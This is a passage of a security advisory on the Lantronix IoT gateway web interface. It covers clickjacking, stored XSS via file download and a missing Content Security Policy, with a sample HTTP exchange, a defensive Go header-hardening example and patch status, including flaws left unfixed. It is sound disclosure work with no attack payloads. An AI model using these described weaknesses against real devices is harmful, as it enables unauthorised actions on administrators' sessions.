CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N, 4.7 Medium
Summary
The website is not protected against Clickjacking.
Impact
An attacker could load the Lantronix web interface in an iframe and make the iframe invisible, forwarding clicks by the user to the Lantronix web interface and therefore manipulate the user into taking undesired actions on the Lantronix IoT gateway's web interface.
Technical details
The Lantronix web interface does not set the X-Frame-Options or Content-Security-Policy header that would prevent clickjacking.
An attacker-controlled website can load the Lantronix website in an iframe.
Precondition
An attacker has to lure a victim who is already logged in to the Lantronix IoT gateway onto an attacker-controlled website. The attacker has to know the URL/IP of the Lantronix web interface for the attack.
Recommendation
It is recommended for Lantronix to:
Set the HTTP header Content-Security-Policy and prevent framing, or use the X-Frame-Options header.
7. Authenticated Stored Cross-Site Scripting (XSS) via File-Download
CVSS:3.1, 0.0 Information
Summary
The file download of the Lantronix web interface is affected by a Cross-Site Scripting issue.
Impact
An attacker can mainly attack other users of the web interface, as the attacked user has to be able to download a file on the web interface. No CVE has been assigned to this vulnerability yet.
Technical details
The Lantronix web interface does not set the Content-Disposition header, which would instruct the browser to download the file rather than interpret it in the browser. The Content-Type header is missing as well, forcing the browser to guess the Content-Type of every downloaded file:
GET /fs?file=%2Ftest.html HTTP/1.1
Host: 192.168.183.43
Cache-Control: max-age=0
Authorization: Basic REDACTED
Upgrade-Insecure-Requests: 1
Origin: http://192.168.183.43
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Connection: close
Accept: */*

HTTP/1.1 200 Ok
Server: Lantronix Web Manager
Date: Thu, 07 Sep 2023 12:01:41 GMT
Content-Length: 65
Connection: close

<html><head></head><body>this is just a little html</body></html>
Therefore, the browser interprets HTML files as HTML. This means an attacker who can convince another user of the Lantronix web interface to download a file could execute arbitrary JavaScript in the context of that user.
Precondition
An attacker would need to attack a user who is already logged in, and at the same time the attacker has to be able to upload files to the Lantronix device. Under normal circumstances this precondition is unlikely to be met.
However, by combining this issue with the Cross-Site Request Forgery issue (see finding 1), an attacker could more easily construct a working exploit. In this case the preconditions of the Cross-Site Request Forgery apply instead.
Recommendation
It is recommended for Lantronix to:
Set the HTTP response header Content-Disposition: attachment in the response and therefore instruct the browser to download the file instead of previewing it.
Set a correct Content-Type HTTP response header.
Prevent upload of file extensions that could lead to XSS.
8. Missing Content Security Policy
CVSS:3.1, 0.0 Information
Summary
There is no policy set for the Cross-Site Scripting (XSS) prevention feature Content Security Policy (CSP).
Impact
A policy could prevent exploitation of an XSS issue if one occurs on the website.
Technical details
No Content Security Policy is set by the Lantronix administrative web interface.
Precondition
An attacker first needs to find an XSS issue to be able to exploit the missing CSP.
Recommendation
It is recommended for Lantronix to:
Change the website so that it does not require inline JavaScript, or use a nonce- or hash-based approach that also allows removing the unsafe-inline keyword. Afterwards, a strong CSP can be put in place.
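An added example (not Lantronix code) in Go that sets the headers recommended for findings 6, 7 and 8 together: a wrapper adds X-Frame-Options and a per-response nonce-based Content-Security-Policy with frame-ancestors 'none' (and therefore no unsafe-inline), and a download handler for a /fs?file=... style request sends Content-Disposition: attachment with a fixed binary Content-Type and nosniff. The in-memory file map and its contents, the nonce format and the handler layout are assumptions made for this example.

```go
package main

import (
	"crypto/rand"
	"encoding/base64"
	"fmt"
	"log"
	"mime"
	"net/http"
	"path"
)

// Constructed in-memory "file system" standing in for the device's /fs
// download endpoint; names and contents are made up for the demo.
var demoFiles = map[string][]byte{
	"/test.html": []byte("<html><head></head><body>this is just a little html</body></html>"),
	"/notes.txt": []byte("serial port 1: 9600 8N1\n"),
}

// newNonce returns a per-response CSP nonce (base64 of 16 random bytes).
func newNonce() (string, error) {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(b), nil
}

// cspFor builds the policy: frame-ancestors 'none' addresses clickjacking
// (finding 6); the nonce lets the page's own inline scripts run so that
// 'unsafe-inline' is not needed (finding 8). Inline scripts in the HTML then
// carry nonce="<value>" for the same response.
func cspFor(nonce string) string {
	return fmt.Sprintf("default-src 'self'; script-src 'nonce-%s'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'", nonce)
}

// securityHeaders adds anti-framing, CSP and nosniff headers to every response.
func securityHeaders(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		nonce, err := newNonce()
		if err != nil {
			http.Error(w, "nonce generation failed", http.StatusInternalServerError)
			return
		}
		h := w.Header()
		h.Set("X-Frame-Options", "DENY") // for browsers without frame-ancestors support
		h.Set("Content-Security-Policy", cspFor(nonce))
		h.Set("X-Content-Type-Options", "nosniff")
		next.ServeHTTP(w, r)
	})
}

// downloadHandler serves ?file=... as an attachment with a fixed binary
// Content-Type, so the browser stores the file instead of rendering it
// (finding 7). The name is cleaned and looked up in the map, so a traversal
// attempt simply does not resolve to an entry.
func downloadHandler(w http.ResponseWriter, r *http.Request) {
	name := path.Clean("/" + r.URL.Query().Get("file"))
	data, ok := demoFiles[name]
	if !ok {
		http.NotFound(w, r)
		return
	}
	h := w.Header()
	h.Set("Content-Type", "application/octet-stream")
	h.Set("Content-Disposition", mime.FormatMediaType("attachment", map[string]string{"filename": path.Base(name)}))
	h.Set("Content-Length", fmt.Sprint(len(data)))
	w.WriteHeader(http.StatusOK)
	w.Write(data)
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/fs", downloadHandler)
	log.Fatal(http.ListenAndServe("127.0.0.1:8080", securityHeaders(mux)))
}
```

Requesting http://127.0.0.1:8080/fs?file=%2Ftest.html now yields the same bytes as in the response above, but the browser saves them as test.html instead of executing the embedded markup, and no page of this server can be placed in a cross-origin iframe.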
Patches and Workaround
Firmware version 8.5.0.0R1, released on 17 November 2023, includes the following information regarding fixes in the release notes:
LEG-447 Authenticated Command Injection
LEG-442 HTTP digest authentication prevents logout
Lantronix released a firmware update on February 07, 2024 that fixes:
Clickjacking
Missing authentication on AES-encrypted connection
Authenticated Stored Cross-Site Scripting (XSS) via File-Download
There is currently no plan to fix:
Cross-Site Request Forgery
Missing Content Security Policy
Vulnerable old components used in Lantronix software